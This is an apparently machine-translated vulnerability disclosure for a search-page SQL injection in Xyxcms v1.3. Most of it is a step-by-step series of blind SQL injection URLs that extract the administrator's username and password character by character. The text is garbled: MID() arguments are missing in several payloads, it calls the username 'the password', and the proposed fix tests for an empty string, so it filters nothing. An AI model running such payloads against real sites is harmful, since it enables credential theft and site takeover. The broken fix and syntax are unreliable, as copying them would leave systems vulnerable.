Xyxcms v1.3 search injection vulnerability and repair methods

Author: mars
Affected Versions: xyxcms v1.3
Official Address: www.xyxcms.com
Vulnerability Description: The Search Page code is not strictly filtered, resulting in string SEARCH injection.
Code Analysis: s. asp from this code, we can see that string SEARCH injection ~

K = request. queryString ("k") page = request. queryString ("page") if page = "" or isnumeric (page) = 0 then g_cur_page = 1 else g_cur_page = cint (page) end if
Vulnerability test exploitation method:
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT CoUNt (*) FrOM admin)> = 0 AnD % 25 = the guess database is admin
Asp? K = 1% 25 "> http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT CoUNt (*) FrOM admin) = 1 AnD % 25 = judge that the Administrator has one
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT CoUNt (*) FrOM admin Where len (username) = 4) = 1 AnD % 25 = the Administrator account length is 4 characters
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT CoUNt (*) FrOM admin Where len (password) = 8) = 1 AnD % 25 = the administrator password is 8 characters long
The length of username is 4.
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT AsC (MID (username,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub) = 109 AnD % 25 = the first user is m
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT AsC (MID (username,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub) = 97 AnD % 25 = the second user is
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT AsC (MID (username,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub) = 114 AnD % 25 = the third user is r
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT AsC (MID (username,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub) = 115 AnD % 25 = user's fourth digit is s
So the password is mars.
Password Length: 8
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT AsC (MID (password,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub) = 49 AnD % 25 = the First password is 1
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT AsC (MID (password,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub) = 50 AnD % 25 = the second password is 2
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT AsC (MID (password,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub) = 51 AnD % 25 = PASSWORD 3 is 3
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT AsC (MID (password,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub) = 52 AnD % 25 = the fourth digit of the password is 4
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT AsC (MID (password, 5, 1) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub) = 113 AnD % 25 = the fifth digit of the password is q
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT AsC (MID (password, 6, 1) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub) = 119 AnD % 25 = the sixth digit of the password is w.
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT AsC (MID (password,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub) = 113 AnD % 25 = the seventh digit of the password is q
Http://www.xxx.com/s.asp? K = 1% 25 AnD (SeLEcT AsC (MID (password,) FrOM (SeLEcT ToP 1 * FrOM (SeLEcT ToP 1 * FrOM admin OrDEr By 1) sub OrDEr By 1 dEsC) sub) = 119 AnD % 25 = the eighth digit of the password is w
The password is 1234 qwqw.
 
The vulnerability fix method can be filtered out.
 
K = request. queryString ("k") if instr (k, "")> 0 response. write "<script> alert (error); window. close (); </script> "response. end () end if page = request. queryString ("page") if page = "" or isnumeric (page) = 0 then g_cur_page = 1 else g_cur_page = cint (page) end if
This article from the independent waiting blog: http://www.waitalone.cn/original address: html "> http://www.waitalone.cn/post/695.html